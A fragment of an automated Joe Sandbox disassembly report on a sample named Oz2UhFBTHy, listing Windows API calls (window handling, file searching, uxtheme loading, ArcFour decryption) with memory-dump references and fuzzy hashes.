                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1177325624-0
                                                                                                      • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                      • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                      • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                      • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 0048397A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$IconicLong
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754861897-0
                                                                                                      • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                      • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                      • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                      • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                      • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                      • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                      • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                      • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241E4
                                                                                                      • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                        • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                        • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                      • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 649377781-0
                                                                                                      • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                      • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                      • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                      • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D0F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 568898626-0
                                                                                                      • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                      • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                      • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                      • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureIconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 2277910766-0
                                                                                                      • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                      • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                      • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                      • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 0042419B
                                                                                                        • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                        • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                        • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                        • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                      • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                        • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2671590913-0
                                                                                                      • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                      • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                      • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                      • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                      • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                      • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                      • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                      • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                      • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                      • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                      • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                      • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                      • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                      • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                      • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                      • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2631587981.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2631554206.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000002.00000002.2634215060.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_10000000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2631587981.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2631554206.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000002.00000002.2634215060.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_10000000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                      • API String ID: 1968650500-2910565190
                                                                                                      • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                      • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                      • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                      • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
